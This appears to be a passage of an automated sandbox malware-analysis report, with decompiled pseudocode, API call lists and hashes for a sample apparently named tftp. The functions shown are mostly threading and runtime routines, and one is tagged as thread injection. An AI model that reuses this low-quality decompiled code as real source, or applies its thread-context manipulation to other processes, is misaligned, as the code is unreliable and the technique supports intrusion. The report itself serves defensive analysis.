										 *_t123 = _t117;
										SetThreadPriority(??, ??);
										_t125 = _t123 - 8;
										 *_t125 =  *(_t92 + 0x18);
										ResetEvent(??);
										_push(_t101);
										if(( *(_t92 + 0x24) & 0x00000004) == 0) {
											 *(_t92 + 0x14) = _t117;
											 *_t125 = _t117;
											_t87 = ResumeThread(??);
											_push(_t87);
										} else {
											 *(_t92 + 0x14) = 0;
											 *_t125 = _t117;
											_t89 = ResumeThread(??);
											 *_t125 = _t117;
											_t87 = CloseHandle(_t89);
											_push(_t87);
										}
										 *_t125 = 0;
										Sleep(??);
										_push(_t87);
										return 0;
									}
								}
							} else {
								_t114 = _t114 + 1;
								continue;
							}
						}
						goto L38;
					}
					 *(_t92 + 0x1c) = 0xffffffff;
					_t55 = _t92 + 0x34; // 0x34
					_t71 = _t55;
					_v48 = _t71;
					_t115 = _v52;
					_t72 = memcpy(_t71, _t115, 4 << 2);
					_t123 =  &(_t122[3]);
					_t107 = _t115 + 8;
					_t96 = 0;
					 *_t92 = 0xbab1f00d;
					 *(_t92 + 0x74) = 0;
					 *(_t92 + 0x6c) = 0;
					if(_t120 != 0) {
						goto L10;
					} else {
						goto L31;
					}
					goto L12;
				}
				L38:
			}

0x0040fa18
0x0040fa1f
0x0040fa23
0x0040fa27
0x0040fa37
0x0040fa37
0x0040fa39
0x0040fa3e
0x0040fa42
0x0040fc6c
0x0040fa48
0x0040fa4e
0x0040fa56
0x0040fa5a
0x0040fa5a
0x0040fa5c
0x0040fa67
0x0040fa6e
0x0040fa71
0x0040fa78
0x0040fa7f
0x0040fa84
0x0040fa84
0x0040fa8c
0x0040fa94
0x0040fa9c
0x0040faa3
0x0040faa8
0x0040faab
0x0040fab0
0x00000000
0x00000000
0x0040fab9
0x0040fbf4
0x0040fbfb
0x0040fc00
0x0040fc01
0x00000000
0x0040fabf
0x0040fabf
0x0040fac6
0x0040facb
0x0040facf
0x0040fad7
0x0040fade
0x0040fade
0x0040fae1
0x0040faec
0x0040faf0
0x0040faf0
0x0040faf0
0x0040faf0
0x0040faf2
0x0040faf8
0x0040faff
0x0040fb08
0x0040fc39
0x0040fc3f
0x0040fc41
0x0040fc45
0x0040fc45
0x0040fc4d
0x0040fc5e
0x0040fb0e
0x0040fb10
0x0040fc7c
0x0040fc7c
0x0040fb16
0x0040fb16
0x0040fb16
0x0040fb19
0x0040fb1c
0x0040fb21
0x0040fcd9
0x0040fcdc
0x0040fb27
0x0040fb27
0x0040fb2a
0x0040fb2a
0x0040fb21
0x0040fb2d
0x0040fb2d
0x0040fb32
0x0040fb3a
0x0040fb42
0x0040fb46
0x0040fb4e
0x0040fb52
0x0040fb59
0x0040fb5e
0x0040fb63
0x0040fc08
0x0040fc0d
0x0040fc0f
0x0040fc12
0x0040fc17
0x0040fc17
0x0040fc1b
0x0040fc1e
0x0040fc30
0x0040fc32
0x00000000
0x0040fb71
0x0040fb71
0x0040fb77
0x0040fc70
0x0040fb7d
0x0040fb80
0x0040fcf0
0x0040fb86
0x0040fb89
0x0040fce4
0x0040fb8f
0x0040fb92
0x0040fb94
0x0040fb94
0x0040fb92
0x0040fb89
0x0040fb80
0x0040fb9c
0x0040fba0
0x0040fba3
0x0040fba8
0x0040fbae
0x0040fbb1
0x0040fbb6
0x0040fbbb
0x0040fc84
0x0040fc87
0x0040fc8a
0x0040fc8f
0x0040fbc1
0x0040fbc1
0x0040fbc8
0x0040fbcb
0x0040fbd1
0x0040fbd4
0x0040fbd9
0x0040fbd9
0x0040fbda
0x0040fbe1
0x0040fbe6
0x0040fbf0
0x0040fbf0
0x0040fb63
0x0040fad1
0x0040fad1
0x00000000
0x0040fad1
0x0040facf
0x00000000
0x0040fab9
0x0040fc98
0x0040fc9f
0x0040fc9f
0x0040fca2
0x0040fcad
0x0040fcb1
0x0040fcb1
0x0040fcb1
0x0040fcb1
0x0040fcb3
0x0040fcb9
0x0040fcc0
0x0040fcc9
0x00000000
0x0040fccf
0x00000000
0x0040fccf
0x00000000
0x0040fcc9
0x00000000

APIs

CreateEventA.KERNEL32 ref: 0040FAA3
Sleep.KERNEL32 ref: 0040FAC6
_beginthreadex.MSVCRT ref: 0040FB59
SetThreadPriority.KERNEL32 ref: 0040FBA3
ResetEvent.KERNEL32 ref: 0040FBB1
ResumeThread.KERNEL32 ref: 0040FBCB
CloseHandle.KERNEL32(00000000), ref: 0040FBD4
Sleep.KERNEL32(00000000), ref: 0040FBE1

Strings

,CA, xrefs: 0040FA2B

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: EventSleepThread$CloseCreateHandlePriorityResetResume_beginthreadex
String ID: ,CA
API String ID: 3227561178-345574230
Opcode ID: 1f0bda3376a3e5a9c6f5631a111dde6149a7c4c435680a8b4310fcf10fe126b6
Instruction ID: 560b257e2af26e1db38ca0d7ae9a029a04a26e8b0a00ab31c97c9b684a1370bc
Opcode Fuzzy Hash: 1f0bda3376a3e5a9c6f5631a111dde6149a7c4c435680a8b4310fcf10fe126b6
Instruction Fuzzy Hash: AB7159B05083048BDB10EF29C48171ABBE4BF45328F14467EEC98AB7C6D779D945CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040F4E4, Relevance: 18.2, APIs: 12, Instructions: 161threadinjectionsynchronizationCOMMON

Download Yara Rule

APIs

GetHandleInformation.KERNEL32 ref: 0040F527
InterlockedIncrement.KERNEL32 ref: 0040F576
SetEvent.KERNEL32(00000000), ref: 0040F586
InterlockedIncrement.KERNEL32 ref: 0040F5D4
SetEvent.KERNEL32(?), ref: 0040F5E4
SuspendThread.KERNEL32 ref: 0040F637
WaitForSingleObject.KERNEL32(00000000), ref: 0040F64B
GetThreadContext.KERNEL32(?,?,00000000), ref: 0040F66B
SetThreadContext.KERNEL32 ref: 0040F687
InterlockedIncrement.KERNEL32(00000000), ref: 0040F6AA
SetEvent.KERNEL32(00010001,00000000,00000000), ref: 0040F6BA
ResumeThread.KERNEL32(00010001,00000000,00000000), ref: 0040F6CE

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: Thread$EventIncrementInterlocked$Context$HandleInformationObjectResumeSingleSuspendWait
String ID:
API String ID: 2723890135-0
Opcode ID: ee53519d986322346ce016d8558e51cf9ed2bab462b682b31cff923172027034
Instruction ID: b500e307fd581d977c45e0d4d8740f35531e15e1edff5a56f0f28468f88423c7
Opcode Fuzzy Hash: ee53519d986322346ce016d8558e51cf9ed2bab462b682b31cff923172027034
Instruction Fuzzy Hash: 9C51A6B05047009ACB20AF75D9856AA7BE4AF44314F11497EE894EB387D73CD845CB6E

Uniqueness

Uniqueness Score: -1.00%

Function 00412884, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 173
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 17%

			E00412884(void* __ecx, void* __edx, char _a4, intOrPtr _a8, signed int _a12) {
				intOrPtr _v32;
				char _v36;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* __edi;
				void* __ebp;
				long _t25;
				signed int _t26;
				intOrPtr _t30;
				signed int _t31;
				signed int _t32;
				signed int _t34;
				signed int _t37;
				signed int _t38;
				long _t39;
				signed int _t40;
				long _t42;
				signed int _t43;
				long _t45;
				long _t50;
				signed int _t52;
				void* _t53;
				void* _t54;
				char _t55;
				signed int _t56;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t61;
				intOrPtr* _t62;
				void* _t69;

				_t54 = __edx;
				_t53 = __ecx;
				_t55 = _a4;
				_t52 = _a12;
				_t67 = _a8 - 1;
				if(_a8 == 1) {
					_v56 = _t52;
					 *_t61 = _t55;
					_t25 = WaitForSingleObject(??, ??);
					_t62 = _t61 - 8;
					__eflags = _t25 - 0x80;
					if(_t25 == 0x80) {
						_t58 = 1;
						goto L15;
					} else {
						__eflags = _t25 - 0x102;
						if(_t25 == 0x102) {
							_t58 = 0x8a;
							L15:
							_v56 = 0;
							 *_t62 = _t55;
							_t26 = WaitForSingleObject(??, ??);
							__eflags = _t26;
							if(_t26 != 0) {
								goto L13;
							} else {
								goto L16;
							}
						} else {
							__eflags = _t25 - 1;
							asm("sbb ebp, ebp");
							_t58 =  !_t57 & 0x00000016;
							__eflags = _t58;
							goto L13;
						}
					}
				} else {
					_v36 = _t55;
					 *_t61 = E0040EF20(_t67);
					_t30 = E0040EF40(_t67);
					_v32 = _t30;
					if(_t30 == 0) {
						__eflags = _t52 - 0xffffffff;
						if(_t52 == 0xffffffff) {
							while(1) {
								_v56 = 0x28;
								 *_t61 = _t55;
								_t31 = WaitForSingleObject(??, ??);
								_t61 = _t61 - 8;
								__eflags = _t31 - 0x80;
								if(_t31 == 0x80) {
									break;
								}
								__eflags = _t31 - 0x102;
								if(_t31 == 0x102) {
									_t37 = E0040F1F8();
									__eflags = _t37;
									if(_t37 != 0) {
										goto L41;
									} else {
										continue;
									}
								} else {
									__eflags = _t31;
									if(_t31 == 0) {
										goto L16;
									} else {
										_t38 = E0040F1F8();
										__eflags = _t38;
										if(_t38 == 0) {
											goto L9;
										} else {
											L41:
											__eflags = _a8 - 2;
											if(__eflags == 0) {
												goto L9;
											} else {
												goto L42;
											}
										}
										goto L13;
									}
								}
								goto L55;
							}
							_t32 = E0040F1F8();
							__eflags = _t32;
							if(_t32 != 0) {
								goto L41;
							} else {
								_v56 = 0;
								 *_t61 = _t55;
								_t34 = WaitForSingleObject(??, ??);
								__eflags = _t34;
								_t58 = (_t34 & 0xffffff00 | _t34 != 0x00000000) & 0x000000ff;
							}
							goto L13;
						} else {
							_t56 = 0x14;
							while(1) {
								__eflags = _t56 - _t52;
								if(_t56 > _t52) {
									_t56 = _t52;
								}
								_v56 = _t56;
								 *_t61 = _t55;
								_t39 = WaitForSingleObject(??, ??);
								_t61 = _t61 - 8;
								__eflags = _t39 - 0x80;
								if(_t39 == 0x80) {
									break;
								}
								__eflags = _t39 - 0x102;
								if(_t39 == 0x102) {
									_t52 = _t52 - _t56;
									__eflags = _t52;
									if(_t52 == 0) {
										_v56 = 0;
										 *_t61 = _t55;
										_t42 = WaitForSingleObject(??, ??);
										__eflags = _t42;
										if(_t42 == 0) {
											goto L16;
										} else {
											_t58 = 0x8a;
											goto L33;
										}
									} else {
										_t43 = E0040F1F8();
										__eflags = _t43;
										if(_t43 == 0) {
											continue;
										} else {
											goto L9;
										}
									}
								} else {
									__eflags = _t39;
									if(_t39 == 0) {
										goto L16;
									} else {
										_t58 = 0x16;
										L31:
										__eflags = _t52 - _t56;
										if(_t52 != _t56) {
											_t40 = E0040F1F8();
											__eflags = _t40;
											if(_t40 == 0) {
												goto L33;
											} else {
												goto L9;
											}
										} else {
											__eflags = _t58;
											if(_t58 != 0) {
												L33:
												__eflags = _a8 - 2;
												if(__eflags != 0) {
													E0040F344(_t54, _t55, __eflags);
												}
											}
										}
										goto L13;
									}
								}
								goto L55;
							}
							_t58 = 1;
							goto L31;
						}
					} else {
						while(1) {
							_v48 = _t52;
							_v52 = 0;
							_v56 =  &_v36;
							 *_t61 = 2;
							_t45 = WaitForMultipleObjects(??, ??, ??, ??);
							_t61 = _t61 - 0x10;
							_t69 = _t45 - 1;
							if(_t69 != 0) {
								break;
							}
							 *_t61 = _v32;
							ResetEvent(??);
							_push(_t53);
							__eflags = _a8 - 2;
							if(__eflags != 0) {
								L42:
								E0040F344(_t54, _t55, __eflags);
								_t58 = 0x16;
								L13:
								return _t58;
							} else {
								E0040F344(_t54, _t55, __eflags);
								continue;
							}
							goto L55;
						}
						if(_t69 < 0) {
							L16:
							_t59 = 0;
							__eflags = 0;
							goto L17;
						} else {
							if(_t45 == 0x80) {
								_t58 = 1;
								goto L21;
							} else {
								if(_t45 == 0x102) {
									_t58 = 0x8a;
									L21:
									_v56 = 0;
									 *_t61 = _v36;
									_t50 = WaitForSingleObject(??, ??);
									__eflags = _t50;
									if(_t50 != 0) {
										goto L7;
									} else {
										_t59 = 0;
										L17:
										return _t59;
									}
								} else {
									_t58 = 0x16;
									L7:
									if(_a8 != 2 && E0040F1F8() != 0) {
										L9:
										_t58 = 0x16;
									}
									goto L13;
								}
							}
						}
					}
				}
				L55:
			}

0x00412884
0x00412884
0x0041288b
0x0041288f
0x00412893
0x00412898
0x00412920
0x00412924
0x00412927
0x0041292c
0x0041292f
0x00412934
0x00412958
0x00000000
0x00412936
0x00412936
0x0041293b
0x00412ae0
0x0041295d
0x0041295d
0x00412965
0x00412968
0x00412970
0x00412972
0x00000000
0x00000000
0x00000000
0x00000000
0x00412941
0x00412941
0x00412944
0x00412948
0x00412948
0x00000000
0x00412948
0x0041293b
0x0041289e
0x0041289e
0x004128a7
0x004128aa
0x004128af
0x004128b5
0x004129cc
0x004129cf
0x00412a3d
0x00412a3d
0x00412a45
0x00412a48
0x00412a4d
0x00412a50
0x00412a55
0x00000000
0x00000000
0x00412a5b
0x00412a60
0x00412a34
0x00412a39
0x00412a3b
0x00000000
0x00000000
0x00000000
0x00000000
0x00412a62
0x00412a62
0x00412a64
0x00000000
0x00412a6a
0x00412a6a
0x00412a6f
0x00412a71
0x00000000
0x00412a78
0x00412a78
0x00412a78
0x00412a7d
0x00000000
0x00000000
0x00000000
0x00000000
0x00412a7d
0x00000000
0x00412a71
0x00412a64
0x00000000
0x00412a60
0x00412b08
0x00412b0d
0x00412b0f
0x00000000
0x00412b15
0x00412b15
0x00412b1d
0x00412b20
0x00412b28
0x00412b30
0x00412b30
0x00000000
0x004129d1
0x004129d1
0x004129d6
0x004129d6
0x004129d8
0x004129da
0x004129da
0x004129dc
0x004129e0
0x004129e3
0x004129e8
0x004129eb
0x004129f0
0x00000000
0x00000000
0x004129f6
0x004129fb
0x00412a94
0x00412a94
0x00412a96
0x00412ab8
0x00412ac0
0x00412ac3
0x00412acb
0x00412acd
0x00000000
0x00412ad3
0x00412ad3
0x00000000
0x00412ad3
0x00412a98
0x00412a98
0x00412a9d
0x00412a9f
0x00000000
0x00412aa5
0x00000000
0x00412aa5
0x00412a9f
0x00412a01
0x00412a01
0x00412a03
0x00000000
0x00412a09
0x00412a09
0x00412a0e
0x00412a0e
0x00412a10
0x00412af6
0x00412afb
0x00412afd
0x00000000
0x00412b03
0x00000000
0x00412b03
0x00412a16
0x00412a16
0x00412a18
0x00412a1e
0x00412a1e
0x00412a23
0x00412a29
0x00412a29
0x00412a23
0x00412a18
0x00000000
0x00412a10
0x00412a03
0x00000000
0x004129fb
0x00412aac
0x00000000
0x00412aac
0x004128bb
0x004128bb
0x004128bb
0x004128bf
0x004128cb
0x004128cf
0x004128d6
0x004128db
0x004128de
0x004128e1
0x00000000
0x00000000
0x00412984
0x00412987
0x0041298c
0x0041298d
0x00412992
0x00412a83
0x00412a83
0x00412a88
0x0041294b
0x00412954
0x00412998
0x00412998
0x00000000
0x00412998
0x00000000
0x00412992
0x004128e7
0x00412974
0x00412974
0x00412974
0x00000000
0x004128ed
0x004128f2
0x00412aec
0x00000000
0x004128f8
0x004128fd
0x004129a2
0x004129a7
0x004129a7
0x004129b3
0x004129b6
0x004129be
0x004129c0
0x00000000
0x004129c6
0x004129c6
0x00412976
0x0041297f
0x0041297f
0x00412903
0x00412903
0x00412908
0x0041290d
0x00412918
0x00412918
0x00412918
0x00000000
0x0041290d
0x004128fd
0x004128f2
0x004128e7
0x004128b5
0x00000000

APIs

WaitForMultipleObjects.KERNEL32 ref: 004128D6
WaitForSingleObject.KERNEL32 ref: 00412927
ResetEvent.KERNEL32 ref: 00412987
WaitForSingleObject.KERNEL32 ref: 004129E3

Strings

(, xrefs: 00412A3D

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: Wait$ObjectSingle$EventMultipleObjectsReset
String ID: (
API String ID: 654736092-3887548279
Opcode ID: bd3acaa23bf91421c23982edc18e5a9b2bf87593e1a5da5e618e7585d87b3f1c
Instruction ID: 5c5c2ff8863f8f4d4c663ff131fcb885ffdfc7cf1585d72dc53d6633b2202c21
Opcode Fuzzy Hash: bd3acaa23bf91421c23982edc18e5a9b2bf87593e1a5da5e618e7585d87b3f1c
Instruction Fuzzy Hash: 3A51C0B06143058AD7307A2A87893BF7590AF40355F10053FEC80D6291E6BDC9E9A75F

Uniqueness

Uniqueness Score: -1.00%

Function 004126B0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 004126E1
CreateSemaphoreA.KERNEL32 ref: 0041272A
CreateSemaphoreA.KERNEL32 ref: 00412754
InitializeCriticalSection.KERNEL32 ref: 00412770
InitializeCriticalSection.KERNEL32(00000000), ref: 0041277C
InitializeCriticalSection.KERNEL32(00000000,00000000), ref: 00412788

Strings

l, xrefs: 004126D2

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: CriticalInitializeSection$CreateSemaphore$calloc
String ID: l
API String ID: 2075313795-2517025534
Opcode ID: 5b9e6fed00ef6033d547eebe48288bd29db57ff46de752f45b009ae400aeac01
Instruction ID: c63a20d822951ac7ddfe9324575e4a483c21d06baa30a9388126c1114bbd5e34
Opcode Fuzzy Hash: 5b9e6fed00ef6033d547eebe48288bd29db57ff46de752f45b009ae400aeac01
Instruction Fuzzy Hash: AD314DF15083009FE710BF29D58479BBBE4AF40318F15496EE8988B386E77DC994CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0040B5F0, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 83memoryfileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 0040B620
vfprintf.MSVCRT ref: 0040B638
abort.MSVCRT(?,?,?,?,?,?,?,?,?,00400000,0040B75E), ref: 0040B63D
VirtualQuery.KERNEL32 ref: 0040B67C
memcpy.MSVCRT ref: 0040B6A0
VirtualProtect.KERNEL32 ref: 0040B6E4
memcpy.MSVCRT ref: 0040B70B
VirtualProtect.KERNEL32 ref: 0040B739

Strings

@, xrefs: 0040B6D1
Mingw runtime failure:, xrefs: 0040B615

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: Virtual$Protectmemcpy$Queryabortfwritevfprintf
String ID: @$Mingw runtime failure:
API String ID: 978211760-2549925133
Opcode ID: 25505b3138dd5f1d2d5502b9c04d42377eca097a31ae58a05eb5733e5c5dc9a1
Instruction ID: 7340633b188a5a55c287f0bf9e033e00e87eb996dcd42df53551f95b8f9d0a99
Opcode Fuzzy Hash: 25505b3138dd5f1d2d5502b9c04d42377eca097a31ae58a05eb5733e5c5dc9a1
Instruction Fuzzy Hash: 74317FB49093459BD700EF29C18465EFBE0BF88748F448D2EF89997291D778D9848F8B

Uniqueness

Uniqueness Score: -1.00%

Function 00403898, Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 40
fileCOMMON

Download Yara Rule

C-Code - Quality: 20%

			E00403898(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char* _a20, intOrPtr _a32, char* _a36, intOrPtr _a40) {
				char* _t25;
				void* _t31;
				intOrPtr _t35;
				void* _t38;
				void* _t39;
				char** _t40;

				 *_t40 = _a36;
				if(_a40 != 1) {
					E004023B0(_t31, _t38, _t39);
					_a32 = 0xffffffff;
					E00402420(_t31);
				} else {
					_t25 =  *((intOrPtr*)( *((intOrPtr*)(E004023B0(_t31, _t38, _t39))) + 8))();
					_a8 = 0xb;
					_a4 = 1;
					 *_t40 = "  what():  ";
					_t35 = __imp___iob + 0x40;
					_a12 = _t35;
					_a16 = _t35;
					_a20 = _t25;
					fwrite(??, ??, ??, ??);
					_a4 = _a16;
					 *_t40 = _a20;
					fputs(??, ??);
					 *_t40 = 0xa;
					_a4 = _a16;
					fputc(??, ??);
					E00402420(_t31);
				}
				L2:
				abort();
				_a8 = 0x2d;
				_a4 = 1;
				 *_t40 = "terminate called without an active exception\n";
				_a12 = __imp___iob + 0x40;
				fwrite(??, ??, ??, ??);
				goto L2;
			}

0x004038a1
0x004038a4
0x00403943
0x00403948
0x00403950
0x004038aa
0x004038b3
0x004038bc
0x004038c4
0x004038cc
0x004038d3
0x004038d6
0x004038da
0x004038de
0x004038e2
0x004038ef
0x004038f3
0x004038f6
0x004038ff
0x00403906
0x0040390a
0x0040390f
0x0040390f
0x00403914
0x00403914
0x0040391e
0x00403926
0x0040392e
0x00403938
0x0040393c
0x00000000

APIs

fwrite.MSVCRT ref: 004038E2
fputs.MSVCRT ref: 004038F6
fputc.MSVCRT ref: 0040390A
abort.MSVCRT ref: 00403914
fwrite.MSVCRT ref: 0040393C

Strings

-, xrefs: 0040391E
terminate called without an active exception, xrefs: 0040392E
what(): , xrefs: 004038CC

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: fwrite$abortfputcfputs
String ID: what(): $-$terminate called without an active exception
API String ID: 631181824-3481984820
Opcode ID: 37297d0e2442c3c2b9cbb4804882408e34ba9d54f100c25c395167d27e001be3
Instruction ID: 1152abee1713096bb3f13fa7c5a1a5353bdea3aa9fb193cacc6e81808b41f2e9
Opcode Fuzzy Hash: 37297d0e2442c3c2b9cbb4804882408e34ba9d54f100c25c395167d27e001be3
Instruction Fuzzy Hash: 1611A4B4508702CBD300AF62C18921EBBE1BF84718F108E2EE595673D1D77899458B5B

Uniqueness

Uniqueness Score: -1.00%

Function 00413170, Relevance: 13.6, APIs: 9, Instructions: 138
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E00413170(void* _a4) {
				struct _CRITICAL_SECTION* _v32;
				void* _v36;
				struct _CRITICAL_SECTION* _v56;
				void* _t27;
				void* _t29;
				void* _t34;
				void* _t35;
				int _t36;
				void* _t41;
				void* _t42;
				struct _CRITICAL_SECTION* _t49;
				struct _CRITICAL_SECTION* _t50;
				void* _t51;
				void _t52;
				void* _t53;
				void* _t58;
				void* _t68;
				void* _t69;
				void* _t70;
				struct _CRITICAL_SECTION* _t71;
				void** _t72;

				_t70 = _a4;
				if(_t70 == 0) {
					L5:
					return 0x16;
				} else {
					_t52 =  *_t70;
					if(_t52 == 0) {
						goto L5;
					} else {
						if(_t52 == 0xffffffff) {
							_t27 =  *0x41db30;
							if(_t27 == 0) {
								_t27 = E00412508();
								 *0x41db30 = _t27;
							}
							 *_t72 = _t27;
							E00411108(_t53);
							if( *_t70 == 0xffffffff) {
								 *_t70 = 0;
								_t68 = 0;
							} else {
								_t68 = 0x10;
							}
							_t29 =  *0x41db30;
							if(_t29 == 0) {
								_t29 = E00412508();
								 *0x41db30 = _t29;
							}
							 *_t72 = _t29;
							E00411070(_t58);
							return _t68;
						} else {
							_t2 = _t52 + 0x60; // 0x60
							_t71 = _t2;
							_t3 = _t52 + 0x48; // 0x48
							_v36 = _t3;
							_v56 = _t71;
							 *_t72 = _v36;
							_t34 = E00412B38( *(_t52 + 0x68), 0xffffffff, 0);
							_t69 = _t34;
							if(_t34 == 0) {
								_t8 = _t52 + 0x14; // 0x14
								_t35 = _t8;
								_v32 = _t35;
								 *_t72 = _t35;
								_t36 = TryEnterCriticalSection(??);
								_push(0);
								if(_t36 == 0) {
									 *_t72 = _t71;
									E00412364( *(_t52 + 0x68), _v36, 1);
									_t69 = 0x10;
								} else {
									if( *((intOrPtr*)(_t52 + 8)) >  *((intOrPtr*)(_t52 + 0x10)) ||  *((intOrPtr*)(_t52 + 4)) != 0) {
										 *_t72 = _t71;
										_t41 = E00412364( *(_t52 + 0x68), _v36, 1);
										_t69 = _t41;
										if(_t41 == 0) {
											_t69 = 0x10;
										}
										_t42 = _v32;
										 *_t72 = _t42;
										LeaveCriticalSection(??);
										_push(_t42);
									} else {
										 *_t70 = 0;
										 *_t72 = _t71;
										E00412364( *(_t52 + 0x68), _v36, 1);
										 *_t72 =  *(_t52 + 0x64);
										CloseHandle(??);
										 *_t72 =  *(_t52 + 0x68);
										_t49 = CloseHandle(_t70);
										 *_t72 = _v32;
										LeaveCriticalSection(_t71);
										_t50 = _v32;
										 *_t72 = _t50;
										DeleteCriticalSection(_t49);
										 *_t72 = _v36;
										DeleteCriticalSection(_t50);
										_t25 = _t52 + 0x2c; // 0x2c
										_t51 = _t25;
										 *_t72 = _t51;
										DeleteCriticalSection(_t50);
										 *_t52 = 0xc0deadbf;
										 *_t72 = _t52;
										free(_t51);
									}
								}
							}
							return _t69;
						}
					}
				}
			}

0x00413177
0x0041317d
0x004131c0
0x004131ce
0x0041317f
0x0041317f
0x00413183
0x00000000
0x00413185
0x00413188
0x004131d0
0x004131d7
0x00413320
0x00413325
0x00413325
0x004131dd
0x004131e0
0x004131e8
0x00413300
0x00413306
0x004131ee
0x004131ee
0x004131ee
0x004131f3
0x004131fa
0x00413310
0x00413315
0x00413315
0x00413200
0x00413203
0x00413211
0x0041318a
0x0041318a
0x0041318a
0x0041318d
0x00413190
0x00413197
0x0041319f
0x004131a9
0x004131ae
0x004131b2
0x00413214
0x00413214
0x00413217
0x0041321b
0x0041321e
0x00413223
0x00413226
0x0041326b
0x00413277
0x0041327c
0x00413228
0x0041322e
0x0041323a
0x00413246
0x0041324b
0x0041324f
0x00413251
0x00413251
0x00413255
0x00413259
0x0041325c
0x00413261
0x00413288
0x00413288
0x00413291
0x0041329d
0x004132a5
0x004132a8
0x004132b1
0x004132b4
0x004132be
0x004132c1
0x004132c7
0x004132cb
0x004132ce
0x004132d8
0x004132db
0x004132e1
0x004132e1
0x004132e4
0x004132e7
0x004132ed
0x004132f3
0x004132f6
0x004132f6
0x0041322e
0x00413226
0x004131bd
0x004131bd
0x00413188
0x00413183

APIs

Part of subcall function 00412B38: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,0041311B), ref: 00412B4E
Part of subcall function 00412B38: InterlockedDecrement.KERNEL32(00000000), ref: 00412B5B
Part of subcall function 00412B38: LeaveCriticalSection.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00000000,0041311B), ref: 00412B6A

TryEnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,00411C04), ref: 0041321E
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,00411C04), ref: 0041325C

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: CriticalSection$EnterLeave$DecrementInterlocked
String ID:
API String ID: 1781445796-0
Opcode ID: 2b145cbc16e31ded482a5c8feb2ed7f5c242e2784b1fbf9680b54a84af06034f
Instruction ID: e5added2243e31ae4ab680dc62f6c15370040b085b691009bc1f3f4a9bf4b69b
